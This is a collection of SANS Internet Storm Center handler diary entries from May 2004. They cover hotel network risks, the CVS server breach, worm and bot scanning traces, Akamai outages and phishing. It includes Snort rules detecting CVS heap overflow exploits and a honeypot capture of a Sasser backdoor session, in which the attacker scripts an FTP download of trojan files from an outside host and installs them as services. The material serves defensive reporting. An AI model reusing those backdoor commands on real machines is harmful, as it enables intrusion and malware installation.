It's been a quiet weekend, Internet malfeasance-wise, so in place of emerging threats the handlers have some advice.

Since this is traditionally the start of the summer travel season (at least in the Northern hemisphere), I felt an infosec travel advisory was in order. Many of you will be traveling for business or pleasure, and will end up using the Internet services in your hotel. Keep in mind that more often than not, these connections are completely unprotected from the outside world. If you're bringing your own machine (or your work's machine) be very careful - this is not your local LAN. At one chain of hotels I often stay at while traveling, I am assigned a publicly addressable IP address with no discernible security infrastructure in place.

Besides outside threats, your system (and more importantly, the data contained therein) is at risk from internal attacks. POP3/IMAP/HTTP credentials can easily be sniffed, and man-in-the-middle attacks are trivially performed by your neighbor. Any file shares you've set up for your home/office LAN use are now available to several hundred hotel guests - make sure you're implementing proper host-based security. This point is even more applicable for those of you attending SANS training or any information security conferences.

This isn't ground breaking, and it isn't rocket science. However, it's all too easy for the keepers of the gates to forget that best practices and defense in depth concepts apply to them, as well.

"I Went To $SECURITY_EVENT and all I got was owned" T-shirts will not impress your peers.

CVShome.org is back on-line with patched versions.

The main site http://www.cvshome.org is back up and stable version 1.11.16 is available.

Again, we would like to reiterate their warning: "any CVS server running a release of CVS earlier than 1.11.16 or 1.12.8 be taken down immediately and patched"

2277/TCP scanning detected. We're interested in captures of any ncat sessions or other captures of more than SYNs or firewall drops.

Other than that, a mostly quiet pre-holiday-weekend Friday.

It appears that the trouble at CVShome is worse than originally thought.

The main site http://www.cvshome.org is still down. German online magazine Heise (1) carries a report from Derek Reboer Price of the CVS team. In it, Price explains that the cvshome servers were breached and a root kit installed, prior to the CVS patches being applied. No further details on the initial breach are available at this time.

The CVS-Bugs mailing list archive (2) carries Price's original posting. In it, he theorises that "...cvshome.org was abused to send the email using a root kit installed prior to the patching of its CVS server for CAN-2004-0396." He advises that "any CVS server running a release of CVS earlier than 1.11.16 or 1.12.8 be taken down immediately and patched."

(1) Heise online magazine http://www.heise.de/security/news/meldung/47645

(2) CVS Bugs http://mail.gnu.org/archive/html/bug-cvs/2004-05/msg00380.html
Mark Cooper mark at mhc-online co uk

Today a report was made of a spyware package which was digitally signed. The package dropped 2 dlls on the pc called kicom.dll and kxcom.dll. A delivery method has not been identified yet.

For removal see
http://www.computing.net/security/wwwboard/forum/11496.html
or
http://securityresponse.symantec.com/avcenter/venc/data/spyware.look2me.html

This is not new, it was published in February.

And an unconfirmed report that Norton Internet Security 4.0 2002, 2003 & 2004 for Windows has added a new feature which pre-scans the inline html images prior to writing the images to the temp directory and displaying them in the web-browser. This effort is to try to identify web borne worms and viruses. The unfortunate side effect is that pages load incredibly slowly. The report stated that Verizon's page took over 3 minutes to load with the scanner and under 3 seconds without it. This could result in users disabling their firewalls which is not a good thing.

Dan Goldberg dan at madjic.net

Overall It has been a fairly quiet day for the Internet at large. Just the "normal" elevated background noise and another MS worm-du-jour.

Another worm hit the streets exploiting the known Windows LSASS
vulnerability. Kaspersky Labs calls this one Padobot, with both an "a" and "b" signature. Details are at:
http://www.viruslist.com/eng/viruslist.html?id=1562410

The LSASS vulnerability is discussed in numerous Handlers Diaries, as well as Microsoft Security Bulletin MS04-011:
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

Possibly as a result, some have reported a very steep rise in port 5000 SYN scans. Upon closer examination, it looks like port 5000 (PnP) is being used to locate Windows hosts, after which connection attempts are made to ports 135 or 445. Here's a sample trace:

2004/05/25 11:23:02.222515 IP 200.21.67.104.3689 > target.net.126.5000: S win 16384

2004/05/25 11:23:02.228521 IP target.net.126.5000 > 200.21.67.104.3689: S ack 1444642199 win 5840

2004/05/25 11:23:02.691561 IP 200.21.67.104.3689 > target.net.126.5000: . ack win 17520

2004/05/25 11:23:02.703911 IP 200.21.67.104.3689 > target.net.126.5000: F ack win 17520

2004/05/25 11:23:02.708177 IP 200.21.67.104.3730 > target.net.126.445: S win 16384

2004/05/25 11:23:02.710557 IP target.net.126.5000 > 200.21.67.104.3689: . ack 0 win 5840

2004/05/25 11:23:03.146508 IP target.net.126.5000 > 200.21.67.104.3689: P ack win 5840

2004/05/25 11:23:03.187780 IP target.net.126.5000 > 200.21.67.104.3689: F ack win 5840

2004/05/25 11:23:03.576007 IP 200.21.67.104.3689 > target.net.126.5000: R win 0

2004/05/25 11:23:03.626723 IP 200.21.67.104.3689 > target.net.126.5000: R win 0

2004/05/25 11:23:05.445877 IP 200.21.67.104.3939 > target.net.126.135: S win 16384

2004/05/25 11:23:07.970316 IP 200.21.67.104.3939 > target.net.126.135: S win 16384

2004/05/25 11:23:12.237244 IP 200.21.67.104.4619 > target.net.126.445: S win 16384

2004/05/25 11:23:14.512929 IP 200.21.67.104.4895 > target.net.126.135: S win 16384

2004/05/25 11:23:17.374700 IP 200.21.67.104.4895 > target.net.126.135: S win 16384

2004/05/25 11:23:21.796316 IP 200.21.67.104.3655 > target.net.126.445: S win 16384

A graph of the port 5000 activity against two different networks is at: http://people.ists.dartmouth.edu/~gbakos/port5000.png

This seems to have quickly run its course, as the graph indicates a steep climb, then equally rapid trailoff. No doubt the vast majority of the LSASS pickin's have been had by Sasser and its variants.

George Bakos
gbakos <at> ists.dartmouth.edu

Akamai Problems

Akamai, the largest of the large scale content delivery services was not delivering content earlier today. According to a post from Akamai:

"An isolated issue occurred this morning (roughly during the period of 8:00 a.m. – 9:30 a.m. ET), where multiple Akamai customers experienced intermittent performance and availability degradation.

This degradation was the result of a bug within one of Akamai's backend content control management tools, which allows the expiration of content on the Akamai network. The degradation was not a result of any outside interference with Akamai's network (such as Denial of Service or hacking).

Upon identification of the bug, Akamai quickly took corrective action which returned customers to normal service levels. Akamai is currently putting measures in place to return the content management tool to its normal working order and is adding safeguards such that the issue will not occur in the future. In the meantime, Akamai customers are able to serve their content through the Akamai Network normally."

So, although it sounds like the rollout of a new version of an internal tool caused them to essentially DoS themselves, things seem to be all better now.


New Angle(r) On An Old Phish

First of all, my apologies for the headline... I couldn't help myself.

It seems that the phisher folk have found some new bait. The newest angle(r) involves sending out fake "order confirmation" messages bearing links that lead to web pages containing exploits for some older IE vulnerabilities. The idea is that no one will be able to resist simply looking at where the link points, and that the phisher will then snag a few unpatched folk in the process. Let's keep those browsers patched, people. And be careful out there...

Other than that, it's been quiet.

Too quiet...

-----------------------------------------------------------
Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )

Update (Mon. May 24th 9 am EST, 13:00 UTC, 15:00 CEST ) It appears that websites that use Akamai's distribution system are currently not reachable. Security related web sites effected are symantec.com and trendmicro.com. Virus updates may fail as a result. Further details are currently not available and updates will be posted here as they become available. Thanks to Vidar Wilkens for alerting us of this problem. According to a post to NANOG, the outage may be the result of a DDOS attack. At this point, Akamai has not ETA for a resolution. Update 09:45 EST: Looks like some of the Akamai hosted sites start to come back. Akamai posted this statement: " Due to a peering problem between ATT and UUNet, a subset of UUNet users may have experienced problems accessing Akamai delivered sites between 8-10pm EDT on Saturday May 22, 2004. The problem has been fully resolved. " ------ "Quiet" day on the Internet

We have received a number of reports of live exploitation of cvs servers using the latest round of exploits. http://www.cvshome.org the source for the cvs system, has been down for atleast two days. No news as to what happened, although two speculations exist: the first is that they are doing an extensive review of the site and the sourcecode, and the other is that they are being D-DoS'ed so that people can not update to the latest version of CVS (put your tin-foil hats on!). The rules at the bottom of the Diary, catch the current exploits posted at K-Otik, but beware that these are stopgap rules and should be replaced once better rules do come out. Tcpdump audit trail tidbits


Tidbit #1

This log below is most likely an agobot variant dujour, scanning for 1025 (M$ RPC, LSA exploit, etc), 135 (same goes), 139 (file shares), 2745 (Beagle, Bagle), 3127 (MyDoom), 445 (Sasser, etc), 6129 (Dameware). This is the current trend, imho, of things to come. Scanner bots that come loaded with a smorgasboard of exploits for the latest vulnerabilities. These botnets become varitable virtual armies waiting for the command to blow the next victim off the net. 4:28:11.568873 66.167.81.191.3058 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.573439 66.167.81.191.3059 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.581346 66.167.81.191.3063 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.668977 66.167.81.191.3072 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.673543 66.167.81.191.3075 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.679083 66.167.81.191.3077 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.686978 66.167.81.191.3082 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.071790 66.167.81.191.3058 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.077521 66.167.81.191.3059 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.085352 66.167.81.191.3063 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.171907 66.167.81.191.3072 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.176461 66.167.81.191.3075 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.184357 66.167.81.191.3077 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.189870 66.167.81.191.3082 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.569024 66.167.81.191.3063 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.574691 66.167.81.191.3059 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.581498 66.167.81.191.3058 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.668028 66.167.81.191.3082 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.673695 66.167.81.191.3077 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.680553 66.167.81.191.3075 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.686003 66.167.81.191.3072 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)


Tidbit #2
This set is a script looking for Sasser or Dabber compromised machines: 04:45:17.543905 221.14.247.154.4263 > foo.foo.foo.104.5554: S 3956724128:3956724128(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.546756 221.14.247.154.4267 > foo.foo.foo.105.5554: S 3956865832:3956865832(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.548661 221.14.247.154.4259 > foo.foo.foo.100.5554: S 3956524133:3956524133(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.551653 221.14.247.154.4269 > foo.foo.foo.107.5554: S 3956971377:3956971377(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.553838 221.14.247.154.4260 > foo.foo.foo.101.5554: S 3956567526:3956567526(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.569655 221.14.247.154.4272 > foo.foo.foo.110.5554: S 3957084821:3957084821(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.988074 221.14.247.154.4590 > foo.foo.foo.104.9898: S 3969576284:3969576284(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.990285 221.14.247.154.4586 > foo.foo.foo.100.9898: S 3969390134:3969390134(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.994860 221.14.247.154.4587 > foo.foo.foo.101.9898: S 3969445181:3969445181(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:18.038802 221.14.247.154.4627 > foo.foo.foo.105.9898: S 3971494464:3971494464(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:18.070218 221.14.247.154.4639 > foo.foo.foo.107.9898: S 3972130192:3972130192(0) win 64240 <mss 1460,nop,nop,sackOK>
04:45:18.079188 221.14.247.154.4645 > foo.foo.foo.110.9898: S 3972431609:3972431609(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
Whats happening on your net at O'Dark-thirty? Use the ISC contact link to let us know ( http://isc.sans.org/contact.php)

Want to share your logs with Dshield? Help protect the Net by sharing your logs. Check here to find out how ( http://www.dshield.org/howto.php )

Reposted a previous diary
In response to seeing the cvs exploits being used in the wild, ISC Handlers George Bakos and Mike Poor put together some simple snort rules to detect the cvs exploits posted at K-Otik. Keep in mind that these are stopgap rules to catch these exploits only, not the vulnerability itself. The exploits are detected by Snort's SHELLCODE rules, but those rules are turned off by default. With the rules below, be sure to change the sid's to match your local.rules numbering. NOTE: these rules will wrap, so eliminate the line feeds when adding them to your local.rules file.
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Linux)"; flow:to_server,established; content:"|45 6e 74 72 79 20 43 43 43 43 43 43 43 43 43 2f 43 43|"; offset:0; depth:20; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000000; rev:1; classtype:attempted-admin;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target BSD)"; flow:to_server,established; content:"|45 6e 74 72 79 20 61 61 61 61 61 61 61 61 61 61 61 61|"; offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000001; rev:1;classtype:attempted-admin;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Solaris)"; flow:to_server,established; content:"|41 72 67 75 6d 65 6e 74 20 62 62 62 62 62 62 62 62 62|";offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000002; rev:1;classtype:attempted-admin;)

Handler on Duty: Mike Poor
mike ^AT^ intelguardians.com

A few days after Johannes Ullrich, SANS CTO, posted some of the ISC's compelling reasons why rebuilding a compromised system should be considered a best practice (for the umpteenth needed time, link below), ISC Handler Chris Carboni shared a link to a May 7th paper reciting Microsoft's reasons that can support rebuilding as a "best practice" (by Jesper M. Johansson, Security Program Manager, Microsoft Corporation). The author's take on "flattening compromised systems" and other issues is a great read and addition to the body of best practice recommendations to rebuild compromised systems.

Experience shows that rebuilding a compromised system is a best practice that some people responsible for the security of systems still want to ignore (in both *NIX & Microsoft shops). These are the folks that will have the time to read the following article ( ; ^ ). So .... if ensuring the confidentiality, integrity and availability of your employer's network, and safekeeping their business and their customers are not good enough reasons to make rebuilding a best practice for compromised systems in your shop, consider the following best practice and career advice from the Microsoft article (my highlighting);

"The only way to clean a compromised system is to flatten and rebuild. That’s right. If you have a system that has been completely compromised, the only thing you can do is to flatten the system (reformat the system disk) and rebuild it from scratch (reinstall Windows and your applications). Alternatively, you could of course work on your resume instead, but I don’t want to see you doing that."
(Help: I Got Hacked. Now What Do I Do? by Jesper M. Johansson, Security Program Manager, Microsoft Corporation: May 7, 2004)

http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx

ISC's recent, needed, umpteenth and not last publication of some of the reasons why "clean up tools may not be adequate" is at;

http://isc.sans.org/diary.php?date=2004-05-03

Port 8000 activity is increasing, tip o' the hat to Ken Connelly's consistently informative Intrusions.Org Log posts;
Dshield Port 8000 Numbers;

http://www.dshield.org/port_report.php?port=8000&recax=1&tarax=2&srcax=2&percent=N&days=90&Redraw=Submit+Query
Two sharp eyed readers correctly pointed out that these scans are more likely for HP print servers with HP Web JetAdmin vulnerabilities. We have received reports of successful exploitation of vulnerable systems.

http://www.securityfocus.com/archive/1/361535/2004-04-24/2004-04-30/0


Last Week's Internet Storm Center: Threat Update Archive is available

If you missed last weeks Internet Storm Center: Threat Update Featuring: Johannes Ullrich, Marcus Sachs and fascinating Q & A submissions ( ; ^ ), you can catch the archived briefing (audio and pdf) by logging in to your SANS Portal account;
http://www.sans.org/webcasts/show.php?webcastid=90488


Patrick Nolan

Exploit code for Symantec Multiple Firewall DNS Response DOS Released


Code exploiting the recently published vulnerability ( http://www.eeye.com/html/Research/Advisories/AD20040512B.html ) in some of Symantec's security products (Norton Internet Security, Norton Personal Firewall, and Norton Anti-Spam) has been posted on Bugtraq. This vulnerability does not provide a remote shell, but is a Denial-of-Service attack.

Again, if you run these products, please update them using Live Update. We predict that it's only a matter of time before we see a "Witty"-like worm in the wild.

Sasser Backdoor Exploit Honeypot Capture


LURHQ's Joe Stewart has provided the following capture of the Sasser Backdoor Exploit. This capture was of an interactive session, not an automated tool.

<snipped exploit hexdump>

mandragore bsh shellcode detected

Bind port is 9875

Binding shell on port 9875

Connection on 9875 from 80.61.65.20

C:\WINNT\system32>echo open LC0311-A.STUDENT.TCU.EDU 6789 > id

C:\WINNT\system32>echo user root root >> id

C:\WINNT\system32>echo bin >> id

C:\WINNT\system32>echo get service.exe >> id

C:\WINNT\system32>echo get mss32.dll >> id

C:\WINNT\system32>echo get sub0t.dll >> id

C:\WINNT\system32>echo get SUB0T.ini >> id

C:\WINNT\system32>echo get mshelp.exe >> id

C:\WINNT\system32>echo bye >> id

C:\WINNT\system32>ftp.exe -i -n -s:id

C:\WINNT\system32>erase id

C:\WINNT\system32>mshelp.exe

C:\WINNT\system32>service.exe /i

C:\WINNT\system32>net start mshelp

C:\WINNT\system32>net start secman

C:\WINNT\system32>dir

Connection closed by peer


Selected Reading Material

For your quiet Saturday reading, posted May 2, 2004 to the SANS Reading Room, "A Security Checklist for Web Application Design," by Gail Zemanek Bayse.

http://www.sans.org/rr/papers/index.php?id=1389

----------------------------------------------------------

Handler-on-Duty: Dave Brookshire ( dsb_AT_rlx.com )